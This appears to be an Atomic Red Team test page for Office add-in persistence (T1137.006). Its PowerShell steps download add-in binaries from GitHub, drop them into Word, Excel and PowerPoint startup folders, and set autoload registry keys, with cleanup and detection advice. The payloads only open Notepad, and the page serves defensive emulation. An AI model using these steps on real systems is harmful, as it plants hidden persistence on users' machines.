# T1137.006 - Add-ins
Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins) There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)

Add-ins can be used to obtain persistence because they can be set to execute code when an Office application starts. 

## Atomic Tests

### Atomic Test #1 - Code Executed Via Excel Add-in File (XLL)
Loads an XLL file using the excel add-ins library.
This causes excel to launch Notepad.exe as a child process. This atomic test does not include persistent code execution as you would typically see when this is implemented in malware.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Microsoft Excel must be installed

##### Check Prereq Commands:
```powershell
try {
  New-Object -COMObject "Excel.Application" | Out-Null
  Stop-Process -Name "Excel"
  exit 0
} catch { exit 1 }

```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Excel manually to meet this requirement"

```
##### Description: XLL files must exist on disk at specified location
##### Check Prereq Commands:
```powershell
if ((Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x64.xll") -and (Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x86.xll")) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\T1137.006\bin\Addins\" -Force | Out-Null
Invoke-Webrequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1137.006/bin/Addins/excelxll_x64.xll" -UseBasicParsing -OutFile "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x64.xll"
Invoke-Webrequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1137.006/bin/Addins/excelxll_x86.xll" -UseBasicParsing -OutFile "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x86.xll"
```

In [ ]:
Invoke-AtomicTest T1137.006 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
$excelApp = New-Object -COMObject "Excel.Application"
if(-not $excelApp.path.contains("Program Files (x86)")){
    Write-Host "64-bit Office"
    $excelApp.RegisterXLL("PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x64.xll")
}
else{
  Write-Host "32-bit Office"
  $excelApp.RegisterXLL("PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x86.xll")
}
```

In [ ]:
Invoke-AtomicTest T1137.006 -TestNumbers 1

#### Cleanup: 
```powershell
Stop-Process -Name "notepad","Excel" -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1137.006 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Persistent Code Execution Via Excel Add-in File (XLL)
Creates an Excel Add-in file (XLL) and sets a registry key to make it run automatically when Excel is started
The sample XLL provided launches the notepad as a proof-of-concept for persistent execution from Office.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Microsoft Excel must be installed

##### Check Prereq Commands:
```powershell
try {
  New-Object -COMObject "Excel.Application" | Out-Null
  Stop-Process -Name "Excel"
  exit 0
} catch { exit 1 }

```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Excel manually to meet this requirement"

```
##### Description: XLL files must exist on disk at specified location
##### Check Prereq Commands:
```powershell
if ((Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x64.xll") -and (Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x86.xll")) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\T1137.006\bin\Addins\" -Force | Out-Null
Invoke-Webrequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1137.006/bin/Addins/excelxll_x64.xll" -UseBasicParsing -OutFile "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x64.xll"
Invoke-Webrequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1137.006/bin/Addins/excelxll_x86.xll" -UseBasicParsing -OutFile "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x86.xll"
```

In [ ]:
Invoke-AtomicTest T1137.006 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
$excelApp = New-Object -COMObject "Excel.Application"
if(-not $excelApp.path.contains("Program Files (x86)")){
    Write-Host "64-bit Office"
    Copy "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x64.xll" "$env:APPDATA\Microsoft\AddIns\notepad.xll"
}
else{
  Write-Host "32-bit Office"
  Copy "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x86.xll" "$env:APPDATA\Microsoft\AddIns\notepad.xll"
}
$ver = $excelApp.version
$ExcelRegPath="HKCU:\Software\Microsoft\Office\$Ver\Excel\Options"
Remove-Item $ExcelRegPath -ErrorAction Ignore
New-Item -type Directory $ExcelRegPath | Out-Null
New-ItemProperty $ExcelRegPath OPEN -value "/R notepad.xll" -propertyType string | Out-Null
$excelApp.Quit()
Start-Process "Excel"
```

In [ ]:
Invoke-AtomicTest T1137.006 -TestNumbers 2

#### Cleanup: 
```powershell
$ver = (New-Object -COMObject "Excel.Application").version
Remove-Item "HKCU:\Software\Microsoft\Office\$Ver\Excel\Options" -ErrorAction Ignore
Stop-Process -Name "notepad","Excel" -ErrorAction Ignore
Start-Sleep 3
Remove-Item "$env:APPDATA\Microsoft\AddIns\notepad.xll" -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1137.006 -TestNumbers 2 -Cleanup

### Atomic Test #3 - Persistent Code Execution Via Word Add-in File (WLL)
Creates a Word Add-in file (WLL) which runs automatically when Word is started
The sample WLL provided launches the notepad as a proof-of-concept for persistent execution from Office.
Successfully tested on 32-bit Office 2016. Not successful from microsoft 365 version of Office. 

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Microsoft Word must be installed

##### Check Prereq Commands:
```powershell
try {
  New-Object -COMObject "Word.Application" | Out-Null
  Stop-Process -Name "winword"
  exit 0
} catch { exit 1 }

```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Word manually to meet this requirement"

```
##### Description: WLL files must exist on disk at specified location
##### Check Prereq Commands:
```powershell
if ((Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\wordwll_x64.wll") -and (Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\wordwll_x86.wll")) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\T1137.006\bin\Addins\" -Force | Out-Null
Invoke-Webrequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1137.006/bin/Addins/wordwll_x64.wll" -UseBasicParsing -OutFile "PathToAtomicsFolder\T1137.006\bin\Addins\wordwll_x64.wll"
Invoke-Webrequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1137.006/bin/Addins/wordwll_x86.wll" -UseBasicParsing -OutFile "PathToAtomicsFolder\T1137.006\bin\Addins\wordwll_x86.wll"
```

In [ ]:
Invoke-AtomicTest T1137.006 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
$wdApp = New-Object -COMObject "Word.Application"
if(-not $wdApp.path.contains("Program Files (x86)"))  
{
  Write-Host "64-bit Office"
  Copy "PathToAtomicsFolder\T1137.006\bin\Addins\wordwll_x64.wll" "$env:APPDATA\Microsoft\Word\Startup\notepad.wll"        
}
else{
  Write-Host "32-bit Office"
  Copy "PathToAtomicsFolder\T1137.006\bin\Addins\wordwll_x86.wll" "$env:APPDATA\Microsoft\Word\Startup\notepad.wll"
}
Stop-Process -Name "WinWord" 
Start-Process "WinWord"
```

In [ ]:
Invoke-AtomicTest T1137.006 -TestNumbers 3

#### Cleanup: 
```powershell
Stop-Process -Name "notepad","WinWord" -ErrorAction Ignore
Start-Sleep 3
Remove-Item "$env:APPDATA\Microsoft\Word\Startup\notepad.wll" -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1137.006 -TestNumbers 3 -Cleanup

### Atomic Test #4 - Persistent Code Execution Via Excel VBA Add-in File (XLAM)
Creates an Excel VBA Add-in file (XLAM) which runs automatically when Excel is started
The sample XLAM provided launches the notepad as a proof-of-concept for persistent execution from Office.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Microsoft Excel must be installed

##### Check Prereq Commands:
```powershell
try {
  New-Object -COMObject "Excel.Application" | Out-Null
  Stop-Process -Name "Excel"
  exit 0
} catch { exit 1 }

```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Excel manually to meet this requirement"

```
##### Description: XLAM file must exist on disk at specified location
##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\ExcelVBAaddin.xlam") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\T1137.006\bin\Addins\" -Force | Out-Null
Invoke-Webrequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1137.006/bin/Addins/ExcelVBAaddin.xlam" -UseBasicParsing -OutFile "PathToAtomicsFolder\T1137.006\bin\Addins\ExcelVBAaddin.xlam"
```

In [ ]:
Invoke-AtomicTest T1137.006 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Copy "PathToAtomicsFolder\T1137.006\bin\Addins\ExcelVBAaddin.xlam" "$env:APPDATA\Microsoft\Excel\XLSTART\notepad.xlam"        
Start-Process "Excel"
```

In [ ]:
Invoke-AtomicTest T1137.006 -TestNumbers 4

#### Cleanup: 
```powershell
Stop-Process -Name "notepad","Excel" -ErrorAction Ignore
Start-Sleep 3
Remove-Item "$env:APPDATA\Microsoft\Excel\XLSTART\notepad.xlam" -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1137.006 -TestNumbers 4 -Cleanup

### Atomic Test #5 - Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)
Creates a PowerPoint VBA Add-in file (PPAM) which runs automatically when PowerPoint is started
The sample PPA provided launches the notepad as a proof-of-concept for persistent execution from Office.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Microsoft Excel must be installed

##### Check Prereq Commands:
```powershell
try {
  New-Object -COMObject "PowerPoint.Application" | Out-Null
  Stop-Process -Name "PowerPnt"
  exit 0
} catch { exit 1 }

```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft PowerPoint manually to meet this requirement"

```
##### Description: PPAM file must exist on disk at specified location
##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\PptVBAaddin.ppam") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\T1137.006\bin\Addins\" -Force | Out-Null
Invoke-Webrequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1137.006/bin/Addins/PptVBAaddin.ppam" -UseBasicParsing -OutFile "PathToAtomicsFolder\T1137.006\bin\Addins\PptVBAaddin.ppam"
```

In [ ]:
Invoke-AtomicTest T1137.006 -TestNumbers 5 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Copy "PathToAtomicsFolder\T1137.006\bin\Addins\PptVBAaddin.ppam" "$env:APPDATA\Microsoft\Addins\notepad.ppam"
$ver = (New-Object -COMObject "PowerPoint.Application").version
$ExcelRegPath="HKCU:\Software\Microsoft\Office\$Ver\PowerPoint\AddIns\notepad"
New-Item -type Directory $ExcelRegPath -Force | Out-Null
New-ItemProperty $ExcelRegPath "Autoload" -value "1" -propertyType DWORD  | Out-Null
New-ItemProperty $ExcelRegPath "Path" -value "notepad.ppam" -propertyType string | Out-Null
Stop-Process -Name "PowerPnt" -ErrorAction Ignore
Start-Process "PowerPnt"
```

In [ ]:
Invoke-AtomicTest T1137.006 -TestNumbers 5

#### Cleanup: 
```powershell
$ver = (New-Object -COMObject "PowerPoint.Application").version
Remove-Item "HKCU:\Software\Microsoft\Office\$Ver\PowerPoint\AddIns\notepad" -ErrorAction Ignore
Stop-Process -Name "notepad","PowerPnt" -ErrorAction Ignore
Start-Sleep 3
Remove-Item "$env:APPDATA\Microsoft\AddIns\notepad.ppam"  -ErrorAction Ignore```

In [ ]:
Invoke-AtomicTest T1137.006 -TestNumbers 5 -Cleanup

## Detection
Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)

Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior